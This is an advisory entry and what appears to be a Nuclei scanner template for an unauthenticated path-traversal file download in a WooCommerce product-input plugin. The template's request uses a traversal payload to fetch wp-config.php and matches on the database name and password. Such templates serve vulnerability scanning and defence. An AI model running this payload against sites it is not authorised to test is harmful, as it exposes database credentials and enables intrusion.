WordPress WooCommerce < 1.2.7 is susceptible to file download vulnerabilities. The lack of authorization checks in the handle_downloads() function hooked to admin_init() could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload.
PoC代码[已公开]
id: wp-woocommerce-file-download
info:
name: Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download
author: 0x_Akoko
severity: high
description: |
WordPress WooCommerce < 1.2.7 is susceptible to file download vulnerabilities. The lack of authorization checks in the handle_downloads() function hooked to admin_init() could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload.
reference:
- https://wpscan.com/vulnerability/15f345e6-fc53-4bac-bc5a-de898181ea74
- https://blog.nintechnet.com/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-22
metadata:
max-request: 1
tags: wordpress,woocommerce,lfi,wp-plugin,wp,vuln
http:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200
# digest: 490a00463044022034a4fa0d5d22ef722b481133664a33eb2b8c59eb4206b0dffe10685268c656f702203038c3e6159e5b171fdc24c1a61a6defc352312557fe1edab71667e840af4fe7:922c64590222798bb761d5b6d8e72950